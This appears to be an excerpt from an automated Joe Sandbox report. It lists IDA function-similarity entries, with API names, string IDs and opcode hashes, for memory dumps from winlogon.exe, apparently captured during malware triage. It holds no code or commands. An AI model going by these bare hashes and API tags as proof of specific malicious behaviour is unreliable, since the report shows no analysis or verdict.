                                                                                                                            • Snapshot File: hcaresult_23_2_2d0165e0000_winlogon.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap$Process$Free
                                                                                                                            • String ID: C:\Windows\system32\winlogon.exe
                                                                                                                            • API String ID: 3168794593-3603389050
                                                                                                                            • Opcode ID: d27b9b8ca154d9eedff1e610dfbacc8608a6d25d7c3fe3b6d17278c798082fda
                                                                                                                            • Instruction ID: 7f7260ef79563c5a266f126e1a848f4d5cc61924374436ce50858df01a2f744e
                                                                                                                            • Opcode Fuzzy Hash: d27b9b8ca154d9eedff1e610dfbacc8608a6d25d7c3fe3b6d17278c798082fda
                                                                                                                            • Instruction Fuzzy Hash: 8621A0AB508AE08AE760DFB59CD9B9D37A1F749B44F894057DB4D83367DE25CC088720
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.3323528654.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_2d0165e0000_winlogon.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Value$ErrorLast
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2506987500-0
                                                                                                                            • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                                                                            • Instruction ID: 881857e728745ec88ca4b8388d6fa749b937d482b05cecb59b8676985d1b6840
                                                                                                                            • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                                                                            • Instruction Fuzzy Hash: B7113D212052C482FF64A7F99DDD329E2426B947B0F945727A83E477F6EE6ACE418600
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.3323528654.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_2d0165e0000_winlogon.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 517849248-0
                                                                                                                            • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                                                                            • Instruction ID: 94470d76e8e99169dc1bd6030e286acf90538daadbbb330fa07aa5c63b58bfdf
                                                                                                                            • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                                                                            • Instruction Fuzzy Hash: BD012931300A9082EB64DBA2A89C799A3A5F788BC5FC84076DE4E43765DF3DCD89C750
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.3323528654.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_2d0165e0000_winlogon.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 449555515-0
                                                                                                                            • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                                                                            • Instruction ID: 0ee65fdd732b982381bbf943d3faa4b165bcf9ac086ffcbc2b1acb993f4b5dc0
                                                                                                                            • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                                                                            • Instruction Fuzzy Hash: 72012975211B80C2EF249BA1EC9C71A73A4BB49B86F94446ADD4D077B5EF3ECA488710
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.3323528654.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_2d0165e0000_winlogon.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                            • String ID: csm$f
                                                                                                                            • API String ID: 2395640692-629598281
                                                                                                                            • Opcode ID: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                                                                                            • Instruction ID: 289176f1ec5211bc532f7d3476c86f990fa8211b4c40f3c47dcc25eee0941410
                                                                                                                            • Opcode Fuzzy Hash: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                                                                                            • Instruction Fuzzy Hash: CB51A43270168086EF18DFA5EC8CB59B7BAF344B88F908526DE5A47758EB76CE41C700
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.3323528654.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_2d0165e0000_winlogon.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FinalHandleNamePathlstrlen
                                                                                                                            • String ID: \\?\
                                                                                                                            • API String ID: 2719912262-4282027825
                                                                                                                            • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                                                                            • Instruction ID: b0a73550e19d607c0733c4eed862a0f106358cff4bd746a1ba228e1ad1f57731
                                                                                                                            • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                                                                            • Instruction Fuzzy Hash: B6F04F2270468192EB708FA1FCC87A9A760F748B89FD44022DA4D479A4DF7DCE8DCB10
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.3323528654.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_2d0165e0000_winlogon.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CombinePath
                                                                                                                            • String ID: \\.\pipe\
                                                                                                                            • API String ID: 3422762182-91387939
                                                                                                                            • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                                                                            • Instruction ID: 9f9f7269bcd04a4d7622e5ff7d9e750e699f4d99e062e085e30b3f0fddd74a17
                                                                                                                            • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                                                                            • Instruction Fuzzy Hash: 50F08C21704BD082EF008BA3BD8C219A260AB48FC0F888172EE4E07B79DF3CC9458710
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.3323528654.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_2d0165e0000_winlogon.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                                                                            • API String ID: 4061214504-1276376045
                                                                                                                            • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                                                                            • Instruction ID: 73b21768389709e2f3859606edec8d020a16b8eaf151ef1aa857b1fe75e1916b
                                                                                                                            • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                                                                            • Instruction Fuzzy Hash: BCF06D61311A9581EF108BB4EC8C36A6361EB88BA1FD4025ADA6E462F4DF2DC9488320
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.3323528654.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_2d0165e0000_winlogon.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentThread
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2882836952-0
                                                                                                                            • Opcode ID: 0c7f3a11ae4e5ff47235e902b7b6ce7055ed727b420134bb2449cab27e882fd8
                                                                                                                            • Instruction ID: 9867a48db4e2f8fc4ca8a19f3b7debced05d252233e4c618cb6bf9eff3b46b8e
                                                                                                                            • Opcode Fuzzy Hash: 0c7f3a11ae4e5ff47235e902b7b6ce7055ed727b420134bb2449cab27e882fd8
                                                                                                                            • Instruction Fuzzy Hash: 2F619076519B84C6EB60CB95E88831AB7A0F384794F905116FACD47BB4DB7EC954CF00
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.3323124982.000002D016580000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D016580000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_2d016580000_winlogon.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _set_statfp
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1156100317-0
                                                                                                                            • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                                                            • Instruction ID: d75896c64213f2a1704ddb0ef00b701f646facd3cf9c70f6f098307262c4cee0
                                                                                                                            • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                                                            • Instruction Fuzzy Hash: 28117326A14ED1D2FB6415E8ECDD36916816B5C37CFC8A63AA96F466F7CA28CC414100
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.3323528654.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_2d0165e0000_winlogon.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _set_statfp
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1156100317-0
                                                                                                                            • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                                                            • Instruction ID: 8658335e92f09a8eeac19449c432923065bddb668eaed47daa1299e6c01b2058
                                                                                                                            • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                                                            • Instruction Fuzzy Hash: 4211A322A52BD411F76415E8DCDD76629406B783B8FC80AB6A97E177F7CB24CC554240
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.3324038371.000002D016610000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002D016610000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_2d016610000_winlogon.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _set_statfp
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1156100317-0
                                                                                                                            • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                                                            • Instruction ID: 066675a3227e3380ea6d786eb6367fb43d600c9f8a81345564ecb5b17240e5d6
                                                                                                                            • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                                                            • Instruction Fuzzy Hash: F6113732664AD111FB5415E9ECFD36933816B597B4FD8462FA96E3A6F6CB24CC814200
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.3323124982.000002D016580000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D016580000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_2d016580000_winlogon.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                            • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                                                                                            • API String ID: 3215553584-4202648911
                                                                                                                            • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                                                                            • Instruction ID: 7926be692a7c3970f031dc47edbaea785ae167cdd99d474087a09ccf8e4f8d1a
                                                                                                                            • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                                                                            • Instruction Fuzzy Hash: 4F617D666006C086FB659BEEEDCC32A6AA9A7897C4FD44517CB4F17FB5DB38CC418210
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.3324038371.000002D016610000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002D016610000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_2d016610000_winlogon.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                            • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                                                                                            • API String ID: 3215553584-4202648911
                                                                                                                            • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                                                                            • Instruction ID: f15d629e17717bbc917658901b4faa7663f175d4ebde133506c68441a3da943e
                                                                                                                            • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                                                                            • Instruction Fuzzy Hash: E3616B766006C042FA699BE9EDDD32A6AE1B7E7780FD5451FDA0E177B8DB38CC458200
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.3323528654.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_2d0165e0000_winlogon.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CallEncodePointerTranslator
                                                                                                                            • String ID: MOC$RCC
                                                                                                                            • API String ID: 3544855599-2084237596
                                                                                                                            • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                                                            • Instruction ID: 804a080e077f51fda726543e3350a461b6da8e690454341ee308e9e8ff120439
                                                                                                                            • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                                                            • Instruction Fuzzy Hash: 8E615973A00B848AEB20DFA5D88439DB7B0F344B88F444216EF4D17BA8DB39CA95C700
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.3323124982.000002D016580000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D016580000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_2d016580000_winlogon.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                            • String ID: csm$csm
                                                                                                                            • API String ID: 3896166516-3733052814
                                                                                                                            • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                                                            • Instruction ID: ef81340c4c69f026b87580c2449cc675fc22f141087421cbe63eea405b38429c
                                                                                                                            • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                                                            • Instruction Fuzzy Hash: 6E516B321006C0CAEB748BA7998835877A8F355B94F988217DE9D87FE5CB38DC91C700
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.3323528654.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_2d0165e0000_winlogon.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                            • String ID: csm$csm
                                                                                                                            • API String ID: 3896166516-3733052814
                                                                                                                            • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                                                            • Instruction ID: ad9e7e9185666ca75af795e8e0b1f6e55ca99cc2d9033536fe9523c4600d1b2c
                                                                                                                            • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                                                            • Instruction Fuzzy Hash: 9D517C761006C08AEF648BB599C8359B7A0F354B85F984217EE9D47BE5CB39DE90CB00
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.3324038371.000002D016610000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002D016610000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_2d016610000_winlogon.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                            • String ID: csm$csm
                                                                                                                            • API String ID: 3896166516-3733052814
                                                                                                                            • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                                                            • Instruction ID: 9e3167ca6576018500916295b4619831fe4f002f2f09af4f197b6fb252918163
                                                                                                                            • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                                                            • Instruction Fuzzy Hash: 2A513C321042C0CAEB648B96998835D77E0F796B94F98921FDE9DC7BA5CB38DC91C701
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.3323124982.000002D016580000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D016580000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_2d016580000_winlogon.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                                                            • String ID: csm$f
                                                                                                                            • API String ID: 3242871069-629598281
                                                                                                                            • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                                                                            • Instruction ID: ebd46bf5b9efac163910b3874f46543552e5e73946441d757bd614891983f18b
                                                                                                                            • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                                                                            • Instruction Fuzzy Hash: 3251CE327017809AEB14DF96F888B193799F354B98F968126DA5F43FA8EB34DD41C704
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.3324038371.000002D016610000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002D016610000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_2d016610000_winlogon.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                                                            • String ID: csm$f
                                                                                                                            • API String ID: 3242871069-629598281
                                                                                                                            • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                                                                            • Instruction ID: f9c655eb386e438f0f2053ae4425263734efa8a51b3dfbce355630ff0d2013ba
                                                                                                                            • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                                                                            • Instruction Fuzzy Hash: A451C1327116808AEB94CF55E888B1937A5F396B98F92C12EDE0F437A8EB34DC41C704
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.3323124982.000002D016580000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D016580000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_2d016580000_winlogon.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                                                            • String ID: csm$f
                                                                                                                            • API String ID: 3242871069-629598281
                                                                                                                            • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                                                                            • Instruction ID: 7c97df61a7296e2470a292fba203d579020853e1c807cf3699b4a2e3da698be7
                                                                                                                            • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                                                                            • Instruction Fuzzy Hash: ED316632201780D6E714DB92EC88B1977A8F780B98F968016AE9F07BA8DB38CD41C704
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.3324038371.000002D016610000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002D016610000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_2d016610000_winlogon.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                                                            • String ID: csm$f
                                                                                                                            • API String ID: 3242871069-629598281
                                                                                                                            • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                                                                            • Instruction ID: 29a1c2b7482391fe9b085b1c522103b88ea60d3cf87a78046d7e28dde30d6717
                                                                                                                            • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                                                                            • Instruction Fuzzy Hash: 4C318B3260168096E764DF51EC88B1977A8F385BD8F96841EEE5F477A8DB38CD40C704
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.3323528654.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_2d0165e0000_winlogon.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2718003287-0
                                                                                                                            • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                                                                            • Instruction ID: 5187ed22ee1aa0ccaa690343eb8763e497484eb7c5724e3e0ad55031fafd28ef
                                                                                                                            • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                                                                            • Instruction Fuzzy Hash: A1D1D0B2B14A8089E711CFF9D88839C3BB1F3547D8F948256CE9D97BA9DA74C906C740
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.3323528654.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_2d0165e0000_winlogon.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ConsoleErrorLastMode
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 953036326-0
                                                                                                                            • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                                                                                            • Instruction ID: fc307cff70842e2266af54710cb554fca6c11a8db0236a9223c07c1d4ecee361
                                                                                                                            • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                                                                                            • Instruction Fuzzy Hash: AA91AFB260069095F7609FE5DCC83AD2BA4B744BC8F94858BDE4E57AA5DB34CC86C700
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.3323528654.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_2d0165e0000_winlogon.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FileType
                                                                                                                            • String ID: \\.\pipe\
                                                                                                                            • API String ID: 3081899298-91387939
                                                                                                                            • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                                                                            • Instruction ID: 8ed4e21bebd3e23e3000fdb066cfaa34740bf68bfd650f15aaa82489475c79c3
                                                                                                                            • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                                                                            • Instruction Fuzzy Hash: 6871AF762007C18AEF649EA59CC83AAB794F389BC4F944127DD0E53BA9DE36CF458700
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.3323124982.000002D016580000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D016580000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_2d016580000_winlogon.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CallTranslator
                                                                                                                            • String ID: MOC$RCC
                                                                                                                            • API String ID: 3163161869-2084237596
                                                                                                                            • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                                                            • Instruction ID: 7d9756844898b90560aff503cb0a52449b1d73c23fde83014149b18977801b46
                                                                                                                            • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                                                            • Instruction Fuzzy Hash: 36614A32600B848AEB24DFAAD88439D7BB4F744B88F444216EF4D17BA9DB38D955C740
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.3324038371.000002D016610000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002D016610000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_2d016610000_winlogon.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CallTranslator
                                                                                                                            • String ID: MOC$RCC
                                                                                                                            • API String ID: 3163161869-2084237596
                                                                                                                            • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                                                            • Instruction ID: 5d37809f7588108028bd218765c44cfc940f184fd99cb5c5cdfab9f263f470b6
                                                                                                                            • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                                                            • Instruction Fuzzy Hash: 1B616C37600B848AEB20DFA5D88439D7BA0F785B8CF54421AEF4D17BA9DB38D995C740
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.3323528654.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_2d0165e0000_winlogon.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FileType
                                                                                                                            • String ID: \\.\pipe\
                                                                                                                            • API String ID: 3081899298-91387939
                                                                                                                            • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                                                                                            • Instruction ID: 4e8424fe214da5e11d23322d54be976519fd80502f98cc10b4f99395f6fd04db
                                                                                                                            • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                                                                                            • Instruction Fuzzy Hash: B651A2326047C185EF649BAAA9DC3AAF751F385780FC58127DD9D07B6DDA3ACE048740
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.3323528654.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_2d0165e0000_winlogon.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorFileLastWrite
                                                                                                                            • String ID: U
                                                                                                                            • API String ID: 442123175-4171548499
                                                                                                                            • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                                                                            • Instruction ID: 34cadd197f94b95d681e4a8cd0f756d6a2bd82b0c53d0e2054fc3c1200778bca
                                                                                                                            • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                                                                            • Instruction Fuzzy Hash: 19419572715BC085DB209FA5E8883AAB7A1F7987D4F908026EE4D877A4DB7CC945C740
                                                                                                                            APIs
                                                                                                                            Strings
